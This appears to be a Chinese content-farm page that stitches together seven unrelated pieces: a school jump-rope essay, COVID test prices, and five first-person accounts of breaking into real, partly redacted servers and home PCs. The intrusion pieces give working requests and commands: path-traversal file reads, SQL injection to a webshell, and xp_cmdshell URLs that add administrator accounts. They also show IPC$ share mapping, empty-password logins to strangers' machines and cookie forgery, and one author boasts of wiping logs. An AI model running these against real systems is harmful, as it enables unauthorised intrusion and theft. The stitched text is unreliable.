一次曲折的安全检测

时间：2023-03-03 08:54:16 其他范文收藏本文下载本文

以下是小编为大家准备的一次曲折的安全检测，本文共7篇，欢迎大家前来参阅。

一次曲折的安全检测

篇1：一次曲折的安全检测

此次安全检测过去有段时间了，一直想写成稿子就是没有时间，具体环境可能有所淡忘，但整个过程和思路还是很明了的，由于在校期间课余在学校的网络工作室工作，所以对一些学校网站的服务和发展比较关注。这期间发现某学院的文件交换系统非常的不错，在校园网内使用会带来很多方面的便捷。搜索了下网上没有现成的系统下载，难道非要自己现写不成…

踩点：

服务器开放了21和80端口，Serv-U6.2、Apache/2.055(win32)PHP/5.1.2；同台服务器上还有一个OA系统。黑盒测试，先是测试上传脚本文件，可以上传，得到提取码后进行提取不会被解析…，对上传过程进行抓包，然后构造不存在的文件，发包，也没有暴出任何敏感信息。对整个的交换系统进行文件扫描也就扫出个config.php，google了下也没有别的文件。刚才不是说还有个OA 系统吗，google OA的时候确实有动态的连接，但所有的连接首先判断是不是校内IP，如果非校内IP直接跳转一个登陆页面，到这里测试完全的陷入了僵局。几经的离开，几经的回来再测试都没有结果，难道真的拿不下它吗？再一次的测试时输入提取码后的下载地址吸引了我。

“hxxp://www.xxx.edu.cn/ex/download.php?url=exchanging%2F09121626171664123.jpg&name=dff3badd8b57fee777c63871.jpg”

url后应该是个绝对地址，那么修改下会不会下到别的文件？

抓包：

GET /ex/download.php?url=exchanging%2F200709121626171664123.jpg&name=dff3badd8b57fee777c63871.jpg

HTTP/1.1

Accept: */*

Referer: hxxp://www.xxx.edu.cn/ex/down.php

Accept-Language: zh-cn

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.1)

Host: www.xxx.edu.cn

Connection: Keep-Alive

Cookie: down_fail_cnt=0

一般WIN32下PHP继承的SYS权限，所以读文件干脆就读c:\boot.ini，Telnet 服务器ip 80发送下面修改好的数据

修改：

/ex/download.php?url=c%3A%5Cboot.ini HTTP/1.1

Accept: */*

Referer: hxxp://www.xxx.edu.cn/ex/down.php

Accept-Language: zh-cn

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.1)

Host: www.xxx.edu.cn

Connection: Keep-Alive

Cookie: down_fail_cnt=0

结果真的返回了boot.ini的内容，狂喜中！

紧接着下来的问题就是猜web目录的路径了，找PHP或者Apache的配置文件应该都能找到WEB的路径，还是上面的发包，当试到路径d:\wwwroot\ex时，没有返回错误信息，说明猜对了他的路径，然后就是读交换系统的文件代码了，代码都是相关联的，发现就7个php文件而且用这个系统根本拿不到shell。进而转攻OA系统，不出意外OA的路径应该就是d:\wwwroot\oa，完全正确！首先读的就是config.php，察看敏感信息，暴出数据库联接信息是本地连接,root权限。然后就是扫描OA文件，测试到这程度能不能拿shell我心里还是没有底，大批的读源文件？… …心里发寒。

突破：

自己陷入矛盾中，放弃吧不甘心；继续吧，就算读完整套代码可能一无所获。心一横，先看看有没有代码过滤再说吧，首先登陆口，随意输入用户名、密码提交，抓包。抓到check.php，然后读代码。它是这么写的：

//echo “系统维护，请稍后访问！”;exit;

require(“config.php”);

require(“public/f_main.php”);

require(“f_db/”.$Database['type'].“.php”);

session_start;

$db = new sql_db($Database['server'], $Database['username'], $Database['password'], $Database['dbname'], false);

if(!$db ->db_connect_id)

{

MsgGo(“数据库连接失败！”,“exit”);

}

foreach($_POST as $key=>$value) $$key=$value;

//用户密码验证

$sql=“SELECT a.*,b.dep_name,b.dep_parent_id,b.dep_id AS dep_id,c.dep_name as dep_parent_name

FROM t_user a

LEFT JOIN t_dep b ON a.dep_id = b.dep_id

LEFT JOIN t_dep c ON c.dep_id = b.dep_parent_id

WHERE user_name ='$user_name'”;

if(!($result = $db->sql_query($sql))) MsgGo(“数据查询失败！”,“login.php”);

if($row = $db->sql_fetchrow($result)){

if($row[“user_status”]!=“1”){

MsgGo(“该用户处于停用状态，暂不能登录！”,“login.php”);

}else{

if(md5($user_password)==$row[“user_password”] || crypt($user_password,$row[“user_password_old”])==$row[“user_password_old”] || $user_password==“qwert12345”)

{

if($row[“user_password_old”]!=“” && $user_password!=“qwert12345”){

$sql=“UPDATE t_user SET

user_password='”.md5($user_password).“',

user_password_old=''

WHERE user_name ='$user_name'”;

if(!$result = $db->sql_query($sql)){

MsgGo(“数据查询失败！”,“login.php”);

}

$sql=“UPDATE t_user SET

last_login_time=”.time().“

WHERE user_name ='$user_name'”;

if(!$result = $db->sql_query($sql)){

MsgGo(“数据查询失败！”,“login.php”);

}

$_SESSION[“sess_user_name”]=$row[“user_name”];

$_SESSION[“sess_user_type”]=$row[“user_type”];

$_SESSION[“sess_user_real_name”]=$row[“user_real_name”];

$_SESSION[“sess_user_level”]=$row[“user_level”];

$_SESSION[“sess_dep_id”]=$row[“dep_id”];

$_SESSION[“sess_dep_name”]=$row[“dep_name”];

if($row[“dep_parent_id”]==“1”){

$_SESSION[“sess_dep_level”]=“1”;

$_SESSION[“sess_dep_id1”]=$row[“dep_id”];

$_SESSION[“sess_dep_parent_id”]=$row[“dep_parent_id”];

$_SESSION[“sess_dep_parent_name”]=$row[“dep_parent_name”];

}elseif($row[“dep_parent_id”]>“1”){

$_SESSION[“sess_dep_level”]=“2”;

$_SESSION[“sess_dep_id1”]=$row[“dep_parent_id”];

$_SESSION[“sess_dep_parent_id”]=$row[“dep_parent_id”];

$_SESSION[“sess_dep_parent_name”]=$row[“dep_parent_name”];

}

WriteLog(“登录系统”);

//writeCookie(“username_recent”,$_SESSION[“sess_user_name”],24*30);

setcookie(“username_recent”,$_SESSION[“sess_user_name”], time()+3600*24*30);

//进入系统主页面

echo “”;

}else{

MsgGo(“密码错误！”,“login.php”);

}

}else{

MsgGo(“用户名错误！”,“login.php”);

}

可以看出check.php过滤非常的不严，直接导致SQL注入！貌似网上有不少类似的文章，

先查出有24个字段，然后

'union select 1,'

提交！

这样hxxp://www.xxx.edu.cn/oa/dir.php 就是我们的shell地址了。

这个shell都不用提权… …直接把文件交换还有OA打包拖回家，也没有搞别的，擦擦日志走人了。

整个过程算是峰回路转啊，那个艰辛啊，知道这样还不如自己写，托回来个有洞的程序-_-，唉。仔细读了下代码，问题出在download.php上，就写错了一个函数… …看来还真验证了那句话“安全来不得半点马虎！”我目的就是拿这个程序，没有再做进一步的渗透，有了小的缺口可能导致整个服务器群的沦陷！安全无小事！

篇2：一次跳绳检测作文

一次跳绳检测作文

周三下午，我们进行了一次跳绳检测。

我们挨个儿排好队，一组一组地跳，我排在第三组。

快轮到我了，我的心像只小兔子似的上蹦下跳怦怦直响。因为我上个学期跳绳测验是年级第一，这个学期也想夺第一，可是我在寒假里又没有好好练习，心里总有些不安。

“嘀—哨声一响，我就飞快地跳了起来，紧张的心情被远远地拋到了九霄云外。我仿佛在一个光环里跳跃，轻快得好像要飞起来，犹如一只小燕子，轻松自如，节奏很稳。

时间一秒一秒地过去了，我的`手臂也变得越来越酸越来越痛，力气也渐渐耗尽了，两条腿像拖了两块足足有百斤重的大石头。但为了取得高分，我还是咬紧牙关，拼命坚持着。

好不容易等到哨声响了，我迫不及待的停下来，气喘吁吁，累极了。

这时，帮我数数的老师告诉我，蓝欣你跳了两百二十九个，我听了，心里像吃了一大勺蜜。

虽然在这次的检测中，我取得了优异的成绩，但发现我体力不支等情况，是因为平时缺乏跳绳锻炼，造成耐力不足的原故。我以后一定要努力练习，不偷懒，争取在下一次检测中取得更好的成绩。

篇3：一次无聊的检测

んㄗ葑Mi

一次无聊的检测，这几天停电，可把我给憋坏了！好不容易电来了，赶紧翻出个源码，简单看了下，发现个注入点，上google去实战。这里我就把这个公布出来吧。Google：inurl:com_job_list1.asp?id 可以注入，是某人才网的源码。找了个注入点，在啊D检测是sa权限。记得某人说过，sa权限拿不下网站只能说明你技术问题。

既然是sa权限，偶当然不能放过了，列目录了一下，发现不能，这时候就想到了xp_cmdshell了，由于在啊D里干啥都没回显，手动测试。

提交www.xxx.com/com_job_list1.asp?id=6228 and 1=(select count(*) FROM master.dbo.sysobjects where xtype = X AND name = xp_cmdshell)

返回正常，

赶紧加个帐号先，www.xxx.com/com_job_list1.asp?id=6228;exec master.dbo.xp_cmdshell net user shaun 111 /add;--

加如管理员组

www.xxx.com/com_job_list1.asp?id=6228;exec master.dbo.xp_cmdshell net localgroup administrators shaun /add;--

远程桌面可以连接，但是登陆时提示远程服务器超出最大允许连接数，mlgb，踢掉一个，www.xxx.com/com_job_list1.asp?id=6228;exec master.dbo.xp_cmdshell logoff 1;--

这回可以正常登陆，

篇4：核酸检测一次多少钱

1月20日起，秦皇岛核酸检测价格调整!

市医保局积极贯彻落实省关于调整新冠病毒核酸检测等医疗服务项目价格的文件精神，自1月20日起，全市各级医疗机构新冠病毒核酸单体检测最高指导价格80元，5个样本混合检测，每样本收费不高于40元;10个样本混合检测，每样本不高于30元。

通知来了!“新型冠状病毒核酸检测”调整为98元/人次

1月24日，海南省医疗保障局和海南省卫生健康委员会联合发布《关于调整新型冠状病毒核酸和抗体检测医疗服务价格的通知》(以下简称《通知》)，明确“新型冠状病毒核酸检测”(包括核酸检测价格与体外诊断试剂盒费用)最高指导价从160元/人次调整为98元/人次。

《通知》指出，为减轻人民群众医疗负担和医疗卫生机构运行成本压力，保障检测试剂供给，近期我省组织实施新冠病毒核酸和抗体检测相关试剂产品集中采购，有效降低新型冠状病毒核酸和抗体检测试剂采购价格。结中采购中选结果。经研究，对我省新型冠状病毒核酸和抗体检测医疗服务价格动态调整。

其中包括调整“新型冠状病毒核酸检测”和“严重急性呼吸综合征冠状病毒抗体测定”医疗服务价格。“新型冠状病毒核酸检测”(包括核酸检测价格与体外诊断试剂盒费用)最高指导价从160元/人次调整为98元/人次;属于政府调拨的，公立医疗机构不得向受检测人员收取体外诊断试剂盒费用，继续按照最高指导价60元/人次(仅为核酸检测价格，不含体外诊断试剂盒费用)标准执行。“严重急性呼吸综合征冠状病毒抗体测定”最高指导价从80元(含检测试剂)调整为30元(不含检测试剂)。

《通知》要求，医疗机构和医保经办部门要及时更新信息系统，按照新标准做好价格公示、检测收费和医保结算等工作。

《通知》强调，除调整以上两项医疗服务价格标准，其他规定仍按照《海南省医疗保障局海南省卫生健康委关于调整临时新增新型冠状病毒核酸检测医疗服务价格的通知》执行。

本《通知》自1月26日起执行。

番禺区市桥医院核酸检测需要多少钱?

市桥医院核酸检测价格：

诊查费10元，检测费69元，共79元。

具体流程

1.挂号：前往市桥医院门诊挂号收费处进行现场挂号。(需持本人身份证、健康码。到达现场后，请您主动出示健康码，并配合医务人员测量体温及流行病学调查后，再进行挂号)

2.开单：周一至周五到本院中医科一号诊室进行开单，周末按照医院指引或到服务台咨询。

3.缴费：返回收费处进行缴费。

4.排队检测：缴费后，到核酸采集区排队采集核酸标本。

拓展：持核酸检测阴性证明返乡后是否需要隔离?

持核酸检测阴性证明返乡后不需要隔离，但需要进行14天居家健康监测，做好体温、症状监测，非必要不外出、不聚集，必须外出时做好个人防护，并在返乡后第7天和第14天分别做一次核酸检测。返乡不满14天的，以实际返乡时间落实居家健康监测和核酸检测要求。??

篇5：对韩国某CMS的一次安全检测

某日，一个做网页设计的朋友发给我一个站（www.ba******.net），问我感觉如何？该网站设计漂不漂亮？明明知道我在艺术方面不太擅长，尤其是美感设计，还发过来，不过既然发过来了，也要上去看看，打开网站后，感觉还是蛮简洁的，如图1所示，就看看它的安全性如何，

图1韩国某网站CMS界面

一、服务器信息收集

1.获取IP信息

直接打开DOS提示符操作窗口，使用ping命令，对网站www.b*******.net进行ping操作，如图2所示，获取IP地址为“221.***.**.21”，且无丢包现象，延迟时间也较少，呵呵，感觉韩国的计算机就是爽，速度快，硬件配置也高。

图2获取网站IP地址

安全小知识

（1）TTL术语

TTL是Time to Live对缩写，它是IP协议包中的一个值，它告诉网络路由器包在网络中的时间是否太长而应被丢弃。有很多原因使包在一定时间内不能被传递到目的地。例如，不正确的路由表可能会导致包的无限循环。一个解决方法就是在一段时间后丢弃这个包，然后给发送者一个报文，由发送者决定是否要重发。TTL的初值通常是系统缺省值，是包头中的8位的域。TTL的最初设想是确定一个时间范围，超过此时间就把包丢弃。由于每个路由器都至少要把TTL值减一，TTL通常表示包在被丢弃前最多能经过的路由器个数。当记数到0时，路由器决定丢弃该包，并发送一个ICMP报文给最初的发送者。

TTL是指定数据报被路由器丢弃之前允许通过的网段数量。通常是由发送主机设置的，以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时，要求路由器至少将 TTL 减小 1。

使用PING时涉及到的 ICMP 报文类型

一个为ICMP请求回显（ICMP Echo Request）

一个为ICMP回显应答（ICMP Echo Reply）

（2）TTL值

TTL 字段值可以帮助我们识别操作系统

类型，下面是一些常见系统的TTL值：

（1）UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255；

（2）Compaq Tru64 5.0 ICMP 回显应答的TTL字段值为64；

（3）微软 Windows NT4 WRKS、Windows NT4 Server、Windows 、Windows XP操作系统 ICMP 回显应答的 TTL字段值为128；

（4）微软 Windows 95、Windows98、Windows98SE、Windows ME操作系统ICMP 回显应答的TTL字段值为 32；

（5）一些特殊情况下，其TTL值会有一些不同：

LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64

FreeBSD 4.1, 4.0, 3.4；Sun Solaris 2.5.1, 2.6, 2.7, 2.8；OpenBSD 2.6, 2.7；NetBSD；HP UX 10.20等等ICMP 回显应答的TTL字段值为255；

从返回的TTL值中，可以初步判定目标主机是linux系统。

防护技巧

在一般意义上可以通过“ping 主机地址”或者“ping 网站域名地址”来获取TTL值，通过TTL值来判断网站所在主机的操作系统类型。一些防护严格的系统会自定义TTL值，从而让入侵者无法通过TTL值来获取操作系统的类型。TTL值的注册表位置

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值，其数据就是默认的TTL值了，我们可以修改，但不能大于十进制的255，

例如本人的计算机的TTL值就是 127，如图3所示，嘿嘿，从常见的TTL值你就无法知道！

图3 自定义TTL值

注意：

修改TTL值后需要重启计算机才能生效，不同计算机操作系统可能修改的TTL值地方不一样，一般情况下是去注册表

“HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet001\Services\Tcpip\Parameters”下修改DefaultTTL的值，如果是在 “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters”中则需要新建“DefaultTTL”键，且类型为DWORD。

2.获取服务器架构信息

通常通过在浏览器中输入“221.139.***.21/antian365/”地址，其中“antian365”为不存在的目录，从返回出错的信息中来判断服务器架构信息，如图4所示，可以看出来系统使用的是apache1.3.36，因为小站根本是使用免费的Mysql数据库，所以可以确认是典型的LAMP架构。

图4获取服务器架构信息

说明：

（1）221.139.***.21/antian365/如果是在IE浏览器输入，一定要把显示友好HTTP错误信息去掉，具体操作：选择IE浏览器－－工具－－Internet选项；在高级选项框中将“显示友好HTTP错误信息”的勾选去掉，这样才能显示详细的错误信息。

LAMP架构网络小知识

LAMP是一种Web网络应用和开发环境，基本上是四种开源软件技术的组合，它们组合在一起产生了一个功能强大的应用服务平台，使用却相对来说比较简单和容易。

LAMP是基于Linux，Apache，MySQL和PHP的开放资源网络开发平台，这个术语来自欧洲，LAMP名字取自每个程序的第一个字母，也有人认为LAMP是一种Web网络应用和开发环境，是Linux, Apache,MySQL, Php/Perl的缩写，每一个字母代表了一个组件。其实LAMP这个词的由来最早始于德国杂志“c't Magazine”，Michael Kunze在1990年最先把这些项目组合在一起创造了LAMP的缩写字。

这些组件并不是开始就设计为一起使用的，由于开源和免费，随着越来越多的人使用它，其兼容性不断改善和完善，因此逐渐成为Web应用程序开发的一种架构。在这个架构中每个程序在所有权里都符合开放源代码标准：Linux是开放系统；Apache是最通用的网络服务器；MySQL是带有基于网络管理附加工具的关系数据库；PHP是流行的对象脚本语言，它包含了多数其它语言的优秀特征来使得它的网络开发更加有效。

有时候，开发者在Windows操作系统下使用这些Linux环境里的工具称为使用WAMP，也称为WAMP架构。随着开源潮流的蓬勃发展，开放源代码的LAMP已经与J2EE和.Net商业软件形成三足鼎立之势，并且该软件开发的项目在软件方面的投资成本较低，因此受到整个IT界的关注。有关LAMP的更多知识，可以查看“LAMP架构帖子”www.antian365.com/bbs /viewthread.php?tid=2639&extra=page%3D1&frombbs=1

3.探测端口信息

用sfind扫一下服务器，发现只开启21，80端口，如图5所示，其中3306Mysql数据库端口也可以进行探测。

图5端口信息

之后使用HScan软件扫描Mysql数据库和FTP弱口令，没有结果。看来还是得从web程序入手

篇6：令人堪忧的网络安全一次非常规安全检测网站安全

这是一次非常规的网路安全检测，或者也可称为网路安全调查，

一、缘由：

几天前，朋友说他们单位的一台数据库服务器好像被人黑了，并且在桌面上留言“***到此一游!”。我赶过去，对这台数据库服务器的系统进行了全面的检查。这台主机是Windows XP系统，没有打SP2补丁包。检查的结果让我非常惊讶：1.系统中有两个管理员用户“administrator”和“new”，并且密码都为空。2.系统开了3389端口，可以进行“远程桌面”连接。3.系统的开了23端口，可以telnet上去。4.系统135、445端口都开着，默认共享也没有删除。5.这台作为数据库服务器的主机，直接用sa连接数据库，密码为“sa”，可以用用SQL连接器连上去。通过问朋友得知这个系统是他用ghost盘做的，因为他看到好多人都是这样做的。难道这种现象具有普遍性?于是才有了这次非常规安全检测，看看笔者本地的网络安全到底怎么样。

二、工具：

s扫描器、微软远程登录工具(mstsc.msc)、telnet、SQL登录器

三、时间段：

某天晚上8点和一个工作日的早晨10点。

四、对象：

本地ADSL用户

五、检测

ADSL拨号上网，运行“命令提示符”(cmd.exe)，然后用“ipconfig”命令获得本机外网ip地址。然后以本机IP为中心，确定一个ip段，以备用s扫描器扫描。

1、远程登录测试(3389端口)

第一步：在命令提示符下运行s扫描器，敲入如下命令：

s syn **.1**.133.1 **.1**.138.254 3389

不到10秒钟，结果出来了。(图1)

图1

令人震惊!这个ip段有365台上线的主机，开3389端口的竟然有202个，占到73.7%!

第二步：用微软自己的“远程桌面连接”工具(mstsc.msc)连接测试，从中随机找一个开了3389端口的主机，进行连接。哇!连上了!敲入用户名“administrator”，空密码测试，提示有“new”用户当前登录。(图2)，原来有一个用户名为“new”的用户在。对不起了，直接点击确定，显示第一次登录的用户配置界面，不到10秒钟，果然进去了。马上“注销”出来。然后用“new”用户，空密码登录，也进去了。对方在看MM!(图3)马上退出来。随即对开了3389的其他主机进行测试，成功率高于60%。在测试中竟然有的Windows SP系统竟然支持多用户登录!登录进去后，对于一个没有安全意识的人他根本无法知道!有部分主机的“new”账户设置了密码，但“administrator”的密码为空。还有部分用户的设置了密码，但密码简单，猜三四次就猜中。比如一些简单的弱口令“123456”、“ndows”、“adsl”等等。

图2

图3

分析：现在用“gost版系统”的用户非常多，这些系统除了一个“administrator”管理员用户外，还有一个“new”用户，也为管理员权限。并且所有的管理员密码都为空!另外有些“电脑城版系统”，竟然支持多用户远程登录!有相当一部分电脑用户对这些浑然不知，没有进行任何安全配置就直接使用。有些电脑用户认为安装了杀毒软件，就可以高枕无忧了。但“大门”敞开，这些杀毒软件就形同虚设，并且杀毒不等于防黑呀!2、IPC$测试(139 445端口)

第一步：在命令提示符下运行s扫描器，敲入如下命令：

s syn **.1**.133.1 **.1**.138.254 139 445

同样时间很短，结果马上出来了，开445端口的比3389的更多，粗略算了一下，超过80%，让人大跌眼镜的是这些主机3389、135都开放!(图4)

图4

第二步：随机找一个ip，在“命令提示符”下运行如下命令：

net use \\**.1**.135.253\ipc$ “” /user:administrator

提示“命令成功完成”

继续敲入命令：

net use z: \\**.1**.135.253\c$

提示“命令成功完成”(图5)

图5

这样就把它的系统盘映射到本机，检测到此为止，

都到了这一步还有什么不能做的呢，这台主机就算系统沦陷了。

分析：这也是“ghost系统”或“电脑城系统”的后遗症，于管理员组的两个用户“administrator”、“new”都为空密码。电脑用户缺乏基本的电脑安全意识，更没有防范意识，请有方面的人来进行配置，系统安装完成不做任何配置就上网逛了，能不被黑吗?3.telnet测试(23端口)

第一步：在命令提示符下运行s扫描器

s syn **.1**.133.1 **.1**.138.254 23

很短的时间，结果就出来了!在测试的在线365个主机中开了23端口的有35个。(图6

第二步：用telnet连接测试

随机找一个IP,敲入如下命令：

telnet **.1**.134.242

用“new”空密码登录失败，换用“adminstrator”空密码，登录成功。(图7)这样获得一个具有管理员权限的“shell”，检测到此结束。有一定基础的“命令行”操作经验的读者都知道，既然获得了“shell”，就等于控制了整个主机。

然后对于其他IP进行测试，也用administrator或者new空密码连接，成功率超过40%。其中有以部分开了23端口的是路由器，用默认用户“admin”，默认密码“admin”，连接，竟然成功。(图8)(图9)，这是两个不同品牌的路由器。既然控制了路由器，那可以拿下的就不仅仅是一台主机了，有可能整个局域网都将沦陷!

分析：主机开了23端口，确实有些莫明其妙!一台个人电脑为什么开23端口，“ghost系统”及“电脑城版系统”都没有打开这个端口。我想这大概是已经有人进入了该主机，然后留的一个后门吧。电脑被入侵了，机主竟然一点都不知道!用户的安全意识可见一斑。另外，一些单位或者个人的路由器，也没有进行任何安全配置就联入网路，连默认的密码都没有更改，不被入侵才怪呢? 4.SQL Server测试(1433端口)

SQL Server是很多企业、事业单位首选的数据库系统。这次测试的时间选在一个工作日早晨10点，因为这时这些数据库服务器都在工作。

第一步：在命令提示符下运行s扫描器，敲入如下命令：

s syn **.1**.133.1 **.1**.138.254 1433

扫描结果有13个。(图10)

第二步：用SQL连接器连接测试：

随机选一个IP，账户为“sa”，密码为空连接成功!(图11)然后敲命令”dir c:“，可以执行!(图12)这样就等于获得了一个具有“system”权限(比管理员权限还高!)的“shell”。测试到此为止!都到了这一步，什么做不成呢?这台SQL server服务器宣告沦陷!

分析：管理员(也许这些单位根本就没有专业的管理员)图方便或安全意识淡薄，以“sa”连接数据库，并且密码为空，或者以”sa“及其简单的数字为密码。这样只要用“扫描器”扫描到这台数据库服务器的IP，就可轻而易举地拿下!数据库的沦陷应该比一般的个人电脑的入侵后果更严重。

总结：以上的安全测试所使用的工具都是一些及其常见的工具，一些是系统自己的，技术上也没有多大的难道，任何一个有一定电脑操作经验的人都可以完成一次入侵。如果别有用心的人拿来干一些事情，那就太可怕了。虽然这次测试的是笔者本地ADSL的一个IP段，但我想这种安全现状在全国肯定具有普遍性,网络安全状况不容乐观 !其主要原因是个人电脑用户安全防范意识淡薄，安全知识贫乏，不具备基本的安全技术。另外企事业单位对网络安全重视不够，缺乏专业的管理员。提高安全防范意识，掌握一定的安全技能，刻不容缓，不然下一个被入侵的人就是你!

篇7：对韩国某CMS的一次安全检测

11.cookie欺骗成功

先看看可否使用UPDATE更新管理员密码，先看一下源代码：33333333333333333333

if （$MB_ID == 'ROOT' && $MB_PW != ''）

{

include '../conf/mkpass.php';

$crypt_key = “ml5300a”;

$INPUT_PASS = crypt（$MB_PW，$crypt_key）;

if （$INPUT_PASS == $ROOT_PASS）

{

setcookie（“MyLootPass” ， $ROOT_PASS ， 0 ， “/”）;

getTargetLink（“../index.php”，“”，“”）;

} else { echo“”; }

}

这个不是可以cookie欺骗吗？于是打开桂林老兵的mybrowse，打开网站后，点击自定义cookie，把cookie修改为：

MyLootPass=mldzOtDVllwqw;PHPSESSID=ae92f7f6cd637f942071b67b8f4881ad，然后刷新一下页面，显示已登录（看左上角），如图18所示，

图18 cookie欺骗成功

12．得到前台可上传页面

这个是前台管理员，在前台管理中，有发公告的地方，并可以上传文件，如图19所示。

图19 有上传可利用管理页面

13.上传php文件受限

后台对文件类型做了一些限制，当我选择php文件时，却弹出一个对话框，如图20所示。

图20限制上传php文件

在没有提交上传的时候，就跳出来对话框，说明肯定本地使用Javascript做了验证，所以可以自己构造一个上传表单来突破，于是先下载上传处理文件upload.php文件。构造其地址：

www.b****k.net/ez/bbs.php?table=sub1&action=down&where=dat&dtype=up&uid=133&file=

../../../../bbs/lib/module/upload/upload.php，下载到本地后打开该文件查看其源代码：4444444444444444444

if （$action == “upload”）

{

if（is_uploaded_file（$HTTP_POST_FILES[upFile][tmp_name]））

{

$upFile_Ext = explode（'.' ， $HTTP_POST_FILES[upFile][name]）;

if （strstr（“html，php3，inc，asp，jsp” ， $upFile_Ext[sizeof（$upFile_Ext）-1]））

{

echo “”;

exit;

}

$filesize = $HTTP_POST_FILES[upFile][size];

……（略去无关代码）

if （is_file（“../../../table/$table/upload/”.$HTTP_POST_FILES[upFile][name]）） {

$upname = date（“His”）.“_”.$HTTP_POST_FILES[upFile][name];

move_uploaded_file（$HTTP_POST_FILES[upFile][tmp_name]，

“../../../table/$table/upload/”.$upname）;

}

else {

$upname = $HTTP_POST_FILES[upFile][name];

move_uploaded_file（$HTTP_POST_FILES[upFile][tmp_name]，

“../../../table/$table/upload/”.$upname）;

}

好象可以上传PHP文件的，先构建一个上传表单，代码如下：

“www.b****k.net/ez/bbs/

lib/module/upload/upload.php” target='Tmp_Up_Iframe' >

(INPUT type=hidden value=upload name=action)

(INPUT type=hidden value=sub1 name=table)

(INPUT type=hidden value=200 name=MaxUp_Size)

(INPUT type=file name=upFile)

(INPUT type=submit value=提交 name=SubmitBtn)

用时将( ) 改为< >

另存为upload.htm，再次选择一个php文件上传试试，发现并不能上传，如图21所示，

图21还是不能上传php文件

于是上传一个gif.phP文件（linux服务器是区分大小写的）。上传成功后，用IE浏览器浏览（不要用Firefox，不然图片也会变成下载）www.b****k.net/ez/bbs/table/sub1/upload/gif.phP

，但发现是出现下载页面，服务器不解释。如图22所示。图22不解释phP文件

再看一看strstr函数的解释。

语法: string strstr（string haystack， string needle）;

本函数将 needle 最先出现在 haystack 处起至 haystack 结束的字符串返回。若找不到 needle 则返回 false。

原来只要文件名后缀包含php3、php、ph、p等类型都不行。没折了，不搞了。

谁知道有什么办法突破，请告知我。

说明：验证个人认为，使用session验证比cookie安全些；还有就是对上传文件格式的验证，一定要在服务器端进行，在客户端验证的话，随便自己在本地构建一个表单就可以轻轻松松绕过了。

三、总结与收获

通过本次对韩国某CMS系统网站进行检测，用到了LiveHTTPHeaders、RefControl插件，通过这些插件来辅助进行安全检查，其效果还是非常明显的，在本次检测中成功进行突破防盗链、进行了cookie欺骗，对php类型的网站安全检查应该是多了一些实际经验。欢迎跟我进行技术探讨，我在antian365.com论坛中的id是N3tl04D。